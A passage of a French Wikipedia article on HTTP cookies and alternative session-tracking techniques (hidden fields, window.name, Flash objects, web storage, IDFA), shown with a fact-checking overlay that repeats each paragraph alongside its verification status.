Les autres inconvénients des chaînes de requêtes sont liés à la sécurité : garder les données qui identifient une session en chaînes de requêtes permet ou simplifie les attaques de fixation de session, les attaques de référence à l'identifiant et d'autres exploitations des failles. Transférer les identifiants de session comme cookies HTTP est plus sécurisé. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les autres inconvénients des chaînes de requêtes sont liés à la sécurité : garder les données qui identifient une session en chaînes de requêtes permet ou simplifie les attaques de fixation de session, les attaques de référence à l'identifiant et d'autres exploitations des failles. Transférer les identifiants de session comme cookies HTTP est plus sécurisé.
×
Champ de formulaire caché
Une forme de suivi de session, utilisée par ASP.NET, est d'utiliser les formulaires web avec des champs cachés. Cette technique est très semblable à l'utilisation des chaînes de requêtes par URL pour porter l'information et a les mêmes avantages et inconvénients ; et si le formulaire est traité avec la méthode HTTP GET, les champs deviennent en fait une partie de l'URL du navigateur qui l'enverra lors de la soumission du formulaire. Mais la plupart des formulaires sont traités avec HTTP POST, qui provoque le formulaire d'information, y compris les champs cachés, pour être ajouté comme une entrée supplémentaire qui n'est ni une partie de l'URL, ni un cookie. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Une forme de suivi de session, utilisée par ASP.NET, est d'utiliser les formulaires web avec des champs cachés. Cette technique est très semblable à l'utilisation des chaînes de requêtes par URL pour porter l'information et a les mêmes avantages et inconvénients ; et si le formulaire est traité avec la méthode HTTP GET, les champs deviennent en fait une partie de l'URL du navigateur qui l'enverra lors de la soumission du formulaire. Mais la plupart des formulaires sont traités avec HTTP POST, qui provoque le formulaire d'information, y compris les champs cachés, pour être ajouté comme une entrée supplémentaire qui n'est ni une partie de l'URL, ni un cookie.
×
Cette approche présente deux avantages du point de vue du suivi : tout d'abord, le suivi de l'information placée dans le code source HTML et en entrée POST plutôt que dans l'URL permettra à l'utilisateur moyen de ne pas remarquer ce suivi ; ensuite, la session d'information n'est pas copiée quand l'utilisateur copie l'URL (pour sauvegarder la page sur disque ou l'envoyer via l'e-mail, par exemple). SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Cette approche présente deux avantages du point de vue du suivi : tout d'abord, le suivi de l'information placée dans le code source HTML et en entrée POST plutôt que dans l'URL permettra à l'utilisateur moyen de ne pas remarquer ce suivi ; ensuite, la session d'information n'est pas copiée quand l'utilisateur copie l'URL (pour sauvegarder la page sur disque ou l'envoyer via l'e-mail, par exemple).
×
window.name
Tous les navigateurs web courants peuvent stocker une assez grande quantité de données (2 Mo à 32 Mo) via JavaScript grâce à la propriété du DOM window.name. Cette donnée peut être utilisée à la place des sessions de cookies et l'est aussi à travers les domaines. La technique peut être couplée avec les objets JSON pour stocker un ensemble complexe de variables de sessions du côté client. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Tous les navigateurs web courants peuvent stocker une assez grande quantité de données (2 Mo à 32 Mo) via JavaScript grâce à la propriété du DOM window.name. Cette donnée peut être utilisée à la place des sessions de cookies et l'est aussi à travers les domaines. La technique peut être couplée avec les objets JSON pour stocker un ensemble complexe de variables de sessions du côté client.
×
L'inconvénient est que chaque fenêtre séparée ou onglet aura initialement un window.name vide ; lors de la navigation par onglets (ouverture par l'utilisateur), cela veut dire que les onglets ouverts individuellement ne disposeront pas de nom de fenêtre. De plus, window.name peut être utilisé pour suivre les visiteurs à travers différents sites, ce qui peut poser un problème de vie privée. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06L'inconvénient est que chaque fenêtre séparée ou onglet aura initialement un window.name vide ; lors de la navigation par onglets (ouverture par l'utilisateur), cela veut dire que les onglets ouverts individuellement ne disposeront pas de nom de fenêtre. De plus, window.name peut être utilisé pour suivre les visiteurs à travers différents sites, ce qui peut poser un problème de vie privée.
×
À certains égards, cela peut être plus sécurisé que les cookies, par la non-implication du serveur, ce qui rend donc invulnérable à l'attaque réseau des cookies renifleurs. Cependant, si des mesures spéciales sont prises pour protéger les données, elles sont vulnérables à d'autres attaques, car les données sont disponibles à travers d'autres sites ouverts dans la même fenêtre. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06À certains égards, cela peut être plus sécurisé que les cookies, par la non-implication du serveur, ce qui rend donc invulnérable à l'attaque réseau des cookies renifleurs. Cependant, si des mesures spéciales sont prises pour protéger les données, elles sont vulnérables à d'autres attaques, car les données sont disponibles à travers d'autres sites ouverts dans la même fenêtre.
×
Authentification HTTP
Le protocole HTTP inclut les protocoles d'authentification d'accès de base et la digestion de l'authentification d'accès, qui permet l'accès à une page web seulement lorsque l'utilisateur a donné le nom d'utilisateur et le mot de passe correct. Si le serveur demande un certificat pour accorder l'accès à une page web, le navigateur le demande à l'utilisateur et, une fois obtenu, le navigateur le stocke et l'envoie dans toutes les requêtes HTTP suivantes. Cette information peut être utilisée pour suivre l'utilisateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le protocole HTTP inclut les protocoles d'authentification d'accès de base et la digestion de l'authentification d'accès, qui permet l'accès à une page web seulement lorsque l'utilisateur a donné le nom d'utilisateur et le mot de passe correct. Si le serveur demande un certificat pour accorder l'accès à une page web, le navigateur le demande à l'utilisateur et, une fois obtenu, le navigateur le stocke et l'envoie dans toutes les requêtes HTTP suivantes. Cette information peut être utilisée pour suivre l'utilisateur.
×
Objet local partagé
Si un navigateur inclut le greffon Adobe Flash Player, les objets locaux partagés peuvent être utilisés dans le même but que les cookies. Ils peuvent être un choix attractif pour les développeurs web car : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Si un navigateur inclut le greffon Adobe Flash Player, les objets locaux partagés peuvent être utilisés dans le même but que les cookies. Ils peuvent être un choix attractif pour les développeurs web car :
×
- la taille limite par défaut d'un objet local partagé est de 100 ko ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
la taille limite par défaut d'un objet local partagé est de 100 ko ;
× - les contrôles de sécurité sont distincts des contrôles des cookies de l'utilisateur (donc les objets locaux partagés peuvent être autorisés quand les cookies ne le sont pas). SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
les contrôles de sécurité sont distincts des contrôles des cookies de l'utilisateur (donc les objets locaux partagés peuvent être autorisés quand les cookies ne le sont pas).
×
Ce dernier point, qui distingue la politique de gestion des cookies de celle des objets locaux partagés d'Adobe, suscite des interrogations[34] concernant la gestion par l'utilisateur de ses paramètres de confidentialité : celui-ci doit être conscient que sa gestion des cookies n'a pas d'impact sur la gestion des objets locaux partagés, et inversement. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Ce dernier point, qui distingue la politique de gestion des cookies de celle des objets locaux partagés d'Adobe, suscite des interrogations concernant la gestion par l'utilisateur de ses paramètres de confidentialité : celui-ci doit être conscient que sa gestion des cookies n'a pas d'impact sur la gestion des objets locaux partagés, et inversement.
×
Une autre critique de ce système concerne le fait qu'il ne peut être utilisé qu'à travers le greffon Adobe Flash Player qui est propriétaire et n'est pas un standard du web. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Une autre critique de ce système concerne le fait qu'il ne peut être utilisé qu'à travers le greffon Adobe Flash Player qui est propriétaire et n'est pas un standard du web.
×
Persistance côté client
Certains navigateurs web supportent un script fondé sur le mécanisme de persistance, qui permet à la page de stocker les informations localement pour une utilisation ultérieure. Internet Explorer supporte par exemple les informations persistantes dans l'historique du navigateur, en favoris, dans un format stocké en XML, ou directement avec une page web sauvée sur disque. Pour Microsoft Internet Explorer 5, il y a une méthode utilisateur-donnée disponible à travers les comportements DHTML. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Certains navigateurs web supportent un script fondé sur le mécanisme de persistance, qui permet à la page de stocker les informations localement pour une utilisation ultérieure. Internet Explorer supporte par exemple les informations persistantes dans l'historique du navigateur, en favoris, dans un format stocké en XML, ou directement avec une page web sauvée sur disque. Pour Microsoft Internet Explorer 5, il y a une méthode utilisateur-donnée disponible à travers les comportements DHTML.
×
Le W3C a introduit dans HTML5 une nouvelle API JavaScript de stockage des données côté client appelée Stockage web local et visant à remplacer définitivement les cookies. Elle est semblable aux cookies, mais avec une capacité grandement améliorée et sans stockage d'information dans l'en-tête des requêtes HTTP. L'API permet deux types de stockage web : localstorage et sessionstorage, similaires aux cookies persistants et aux cookies de session (à la différence que les cookies de session expirent à la fermeture du navigateur alors que les variables de sessionstorage expirent à la fermeture de l'onglet), respectivement. Web storage est supportée par Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 et Opera 10.50. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le W3C a introduit dans HTML5 une nouvelle API JavaScript de stockage des données côté client appelée Stockage web local et visant à remplacer définitivement les cookies. Elle est semblable aux cookies, mais avec une capacité grandement améliorée et sans stockage d'information dans l'en-tête des requêtes HTTP. L'API permet deux types de stockage web : localstorage et sessionstorage, similaires aux cookies persistants et aux cookies de session (à la différence que les cookies de session expirent à la fermeture du navigateur alors que les variables de sessionstorage expirent à la fermeture de l'onglet), respectivement. Web storage est supportée par Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 et Opera 10.50.
×
Un mécanisme différent s'appuie normalement sur la mise en cache des navigateurs (portant sur la mémoire plutôt que sur le rafraîchissement) utilisant les programmes JavaScript dans les pages web. Par exemple, une page peut contenir la balise <script type="text/javascript" src="exemple.js">. La première fois que la page se charge, le programme 'exemple.js' est aussi chargé. À ce point, le programme reste en mémoire cache et la page visitée n'est pas rechargée une seconde fois. En conséquence, si le programme contient une variable globale (par exemple var id = 3243242;), cet identifiant reste valide et peut être exploité par un autre code JavaScript une nouvelle fois que la page est chargée, ou une fois qu'une page liant le programme est chargée. L'inconvénient majeur de cette méthode est que la variable globale de JavaScript doit être statique, cela veut dire qu'elle ne peut pas être changée ou supprimée comme un cookie. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Un mécanisme différent s'appuie normalement sur la mise en cache des navigateurs (portant sur la mémoire plutôt que sur le rafraîchissement) utilisant les programmes JavaScript dans les pages web. Par exemple, une page peut contenir la balise <script type="text/javascript" src="exemple.js">. La première fois que la page se charge, le programme 'exemple.js' est aussi chargé. À ce point, le programme reste en mémoire cache et la page visitée n'est pas rechargée une seconde fois. En conséquence, si le programme contient une variable globale (par exemple var id = 3243242;), cet identifiant reste valide et peut être exploité par un autre code JavaScript une nouvelle fois que la page est chargée, ou une fois qu'une page liant le programme est chargée. L'inconvénient majeur de cette méthode est que la variable globale de JavaScript doit être statique, cela veut dire qu'elle ne peut pas être changée ou supprimée comme un cookie.
×
Identifiant pour publicitaires (IDFA)
La société Apple utilise une technique de pistage nommée « identifier for advertisers » (IDFA). Cette technique attribue un identifiant unique à chaque utilisateur d'un outil fonctionnant sur iOS (par exemple iPhone ou iPad). Cet identifiant est ensuite utilisé par le réseau publicitaire d'Apple, iAd, pour déterminer quelle publicité les utilisateurs visualisent et de répondre. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La société Apple utilise une technique de pistage nommée « identifier for advertisers » (IDFA). Cette technique attribue un identifiant unique à chaque utilisateur d'un outil fonctionnant sur iOS (par exemple iPhone ou iPad). Cet identifiant est ensuite utilisé par le réseau publicitaire d'Apple, iAd, pour déterminer quelle publicité les utilisateurs visualisent et de répondre.
×
En résumé
Les cookies sont de petits fichiers textes stockés par le navigateur web sur le disque dur du visiteur d'un site web et qui servent (entre autres) à enregistrer des informations sur le visiteur ou encore sur son parcours dans le site. Le webmaster peut ainsi reconnaître les habitudes d'un visiteur et personnaliser la présentation de son site pour chaque visiteur ; les cookies permettent alors de garder en mémoire combien d'articles il faut afficher en page d'accueil ou encore de retenir les identifiants de connexion à une éventuelle partie privée : lorsque le visiteur revient sur le site, il ne lui est plus nécessaire de taper son nom et son mot de passe pour se faire reconnaître, puisqu'ils sont automatiquement lus dans le cookie. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies sont de petits fichiers textes stockés par le navigateur web sur le disque dur du visiteur d'un site web et qui servent (entre autres) à enregistrer des informations sur le visiteur ou encore sur son parcours dans le site. Le webmaster peut ainsi reconnaître les habitudes d'un visiteur et personnaliser la présentation de son site pour chaque visiteur ; les cookies permettent alors de garder en mémoire combien d'articles il faut afficher en page d'accueil ou encore de retenir les identifiants de connexion à une éventuelle partie privée : lorsque le visiteur revient sur le site, il ne lui est plus nécessaire de taper son nom et son mot de passe pour se faire reconnaître, puisqu'ils sont automatiquement lus dans le cookie.
×
Un cookie a une durée de vie limitée, fixée par le concepteur du site. Ils peuvent aussi expirer à la fin de la session sur le site, ce qui correspond à la fermeture du navigateur. Les cookies sont largement utilisés pour simplifier la vie des visiteurs et leur présenter des informations plus pertinentes. Mais des techniques particulières permettent de suivre un visiteur sur plusieurs sites et ainsi de collecter et regrouper des informations très étendues sur ses habitudes. Cette méthode a donné à l'usage des cookies une réputation de technique de surveillance violant la sphère privée des visiteurs, ce qui correspond à la réalité dans de nombreux cas d'utilisation pour des raisons non « techniques » ou non respectueuses des attentes des utilisateurs. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Un cookie a une durée de vie limitée, fixée par le concepteur du site. Ils peuvent aussi expirer à la fin de la session sur le site, ce qui correspond à la fermeture du navigateur. Les cookies sont largement utilisés pour simplifier la vie des visiteurs et leur présenter des informations plus pertinentes. Mais des techniques particulières permettent de suivre un visiteur sur plusieurs sites et ainsi de collecter et regrouper des informations très étendues sur ses habitudes. Cette méthode a donné à l'usage des cookies une réputation de technique de surveillance violant la sphère privée des visiteurs, ce qui correspond à la réalité dans de nombreux cas d'utilisation pour des raisons non « techniques » ou non respectueuses des attentes des utilisateurs.
×
En réponse à ces craintes légitimes, l'HTML5 introduit une nouvelle API JavaScript de stockage des données côté client appelée
Web storage, beaucoup plus sûre et avec une plus grande capacité, qui vise à remplacer les cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En réponse à ces craintes légitimes, l'HTML5 introduit une nouvelle API JavaScript de stockage des données côté client appelée Web storage, beaucoup plus sûre et avec une plus grande capacité, qui vise à remplacer les cookies.
×
Stockage des cookies
Avec certains navigateurs, un cookie est facilement modifiable. En effet, un logiciel éditeur de texte (ex. : Bloc-notes) suffit à en changer les valeurs manuellement. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Avec certains navigateurs, un cookie est facilement modifiable. En effet, un logiciel éditeur de texte (ex. : Bloc-notes) suffit à en changer les valeurs manuellement.
×
Les cookies sont enregistrés différemment selon les navigateurs : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies sont enregistrés différemment selon les navigateurs :
×
- Microsoft Internet Explorer enregistre chaque cookie dans un fichier différent ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Microsoft Internet Explorer enregistre chaque cookie dans un fichier différent ;
× - Mozilla Firefox enregistre tous ses cookies dans un seul fichier (une base de données SQLite) ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Mozilla Firefox enregistre tous ses cookies dans un seul fichier (une base de données SQLite) ;
× - Opera enregistre tous ses cookies dans un seul fichier et le chiffre (impossible de les modifier sauf depuis les options du logiciel) ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Opera enregistre tous ses cookies dans un seul fichier et le chiffre (impossible de les modifier sauf depuis les options du logiciel) ;
× - Apple Safari enregistre tous ses cookies dans un seul fichier ayant l'extension « .plist ». La modification est possible, mais très peu aisée, à moins de parcourir les options du logiciel. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Apple Safari enregistre tous ses cookies dans un seul fichier ayant l'extension « .plist ». La modification est possible, mais très peu aisée, à moins de parcourir les options du logiciel.
×
Il est demandé aux navigateurs de supporter au minimum[20] : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Il est demandé aux navigateurs de supporter au minimum :
×
- 300 cookies simultanés ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
300 cookies simultanés ;
× - 4 096 octets par cookie ; SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
4 096 octets par cookie ;
× - 20 cookies par hôte ou par domaine. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
20 cookies par hôte ou par domaine.
×
Notes et références
(en) Cet article contient des extraits de la Free On-line Dictionary of Computing qui autorise l'utilisation de son contenu sous licence GFDL. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06(en) Cet article contient des extraits de la Free On-line Dictionary of Computing qui autorise l'utilisation de son contenu sous licence GFDL.
×
192 passages sourcés · 0 champs corroborés · 0 étayés · 72 à examiner. Les repères signalent aussi tout contenu affiché sans contrôle correspondant et expliquent ce qui manque.
Points à vérifier (16)
Un signalement indique un contrôle manquant ou incomplet, pas une erreur certaine. Les modifications publiques sont actuellement désactivées.
- Passage de cet article — Non vérifié
Historique
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Une interaction possible entre un navigateur web et le serveur hébergeant la page web. Le serveur envoie un cookie au navigateur et le navigateur le renvoie quand il appelle une autre page.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Exemple d'une réponse HTTP de google.com, qui met en place un cookie avec des attributs.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Dans cet exemple fictif, une entreprise de publicité a placé des bannières dans deux sites web. En hébergeant les bannières sur ses serveurs et en utilisant les cookies tierce partie, l'entreprise de publicité est capable de suivre la navigation de l'utilisateur à travers ces deux sites.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Un cookie peut être volé par un autre ordinateur sur le réseau.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
L'écriture de script dans le site : un cookie qui devrait seulement être échangé entre le serveur et le client est envoyé à un autre tiers.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Modification du contenu : un attaquant envoie à un serveur un cookie invalide, éventuellement réalisé à partir d'un cookie valide envoyé par le serveur.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Dans la méthode du remplacement de cookie, l'attaquant exploite un problème du navigateur pour envoyer un cookie invalide au serveur.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Enciclopedia De Agostini
Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.
- Passage de cet article — Non vérifié
Nationalencyklopedin
Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.
- Passage de cet article — Non vérifié
Store norske leksikon
Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.
- Passage de cet article — Non vérifié
Treccani
Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.
- Passage de cet article — Non vérifié
Tchéquie
Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.
- Passage de cet article — Non vérifié
Le terme cookie dérive du terme anglais , désignant un paquet de données qu'un programme reçoit et renvoie inchangé. En français, les cookies sont aussi appelés « témoin de connexion »,, « témoin de navigation » ou « témoin »,.
Ce passage ne dispose pas encore de vérification factuelle exploitable.
- Passage de cet article — Non vérifié
Une interaction possible entre un navigateur web et le serveur hébergeant la page web. Le serveur envoie un cookie au navigateur et le navigateur le renvoie quand il appelle une autre page.
Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.
- Passage de cet article — Non vérifié
Un cookie (prononcé ˈkʊk.i], litt. « biscuit » en anglais), également appelé témoin de connexion ou témoin de navigation, est une petite quantité de données envoyée par un serveur HTTP à l'utilisateur d'un site web puis stockée par son navigateur sur son…
Ce passage ne dispose pas encore de vérification factuelle exploitable.
Voir aussi
Sur les autres projets Wikimedia : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Sur les autres projets Wikimedia :
×
- Cookie (informatique), sur Wikimedia Commons SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Cookie (informatique), sur Wikimedia Commons
× - cookie, sur le Wiktionnaire SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
cookie, sur le Wiktionnaire
× - Cookie (informatique), sur Wikiversity SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Cookie (informatique), sur Wikiversity
×
Articles connexes
- Internet Engineering Task Force (IETF), produit la plupart des nouveaux standards d'Internet. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Internet Engineering Task Force (IETF), produit la plupart des nouveaux standards d'Internet.
× - HTTP SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
HTTP
× - Client HTTP SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Client HTTP
× - Navigateur web SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Navigateur web
× - Secure cookie SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Secure cookie
× - Platform for Privacy Preferences, projet à l'initiative du consortium W3C (qui énonce les standards du Web et d'Internet), datant de 2002 SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Platform for Privacy Preferences, projet à l'initiative du consortium W3C (qui énonce les standards du Web et d'Internet), datant de 2002
× - World Wide Web SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
World Wide Web
× - Local Shared Object (LSO), un équivalent utilisé par Adobe Flash SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Local Shared Object (LSO), un équivalent utilisé par Adobe Flash
× - Logiciel antipub dont un effet peut être d'éviter le pistage de l'internaute par les régies de publicité s'appuyant sur le système de cookies de sites tiers SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Logiciel antipub dont un effet peut être d'éviter le pistage de l'internaute par les régies de publicité s'appuyant sur le système de cookies de sites tiers
× - Unique Identifier Header, technologie numérique d'identification qui permet de suivre la navigation sur internet d'un utilisateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Unique Identifier Header, technologie numérique d'identification qui permet de suivre la navigation sur internet d'un utilisateur.
× - Historique de navigation web SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Historique de navigation web
×
Liens externes
- Notices dans des dictionnaires ou encyclopédies généralistes : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Notices dans des dictionnaires ou encyclopédies généralistes :
×- Enciclopedia De Agostini Non vérifiéNon vérifié Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.×
- Nationalencyklopedin Non vérifiéNon vérifié Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.×
- Store norske leksikon Non vérifiéNon vérifié Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.×
- Treccani Non vérifiéNon vérifié Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.×
- Notices d'autorité : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Notices d'autorité :
×- Tchéquie Non vérifiéNon vérifié Ce contenu affiché ne dispose pas encore d’un contrôle factuel correspondant.×
- « Profilage : vous reprendrez bien un petit cookie ? », La Science, CQFD, France Culture, 16 août 2023. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
« Profilage : vous reprendrez bien un petit cookie ? », La Science, CQFD, France Culture, 16 août 2023.
×
Sur la directive 2009/136/CE : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Sur la directive 2009/136/CE :
×
- Directive 2009/136/CE du Parlement européen et du Conseil du 25 novembre 2009, sur EUR-Lex. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Directive 2009/136/CE du Parlement européen et du Conseil du 25 novembre 2009, sur EUR-Lex.
× - Directive 2009/136/CE du Parlement européen et du Conseil du 25 novembre 2009, sur Légifrance. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
Directive 2009/136/CE du Parlement européen et du Conseil du 25 novembre 2009, sur Légifrance.
× - « Cookie » (définition), Commission nationale de l'informatique et des libertés. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
« Cookie » (définition), Commission nationale de l'informatique et des libertés.
×
Informations à caractère technique : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Informations à caractère technique :
×
- (en) Persistent Client State HTTP Cookies - Preliminary Specification, copie de la première spécification des cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06
(en) Persistent Client State HTTP Cookies - Preliminary Specification, copie de la première spécification des cookies.
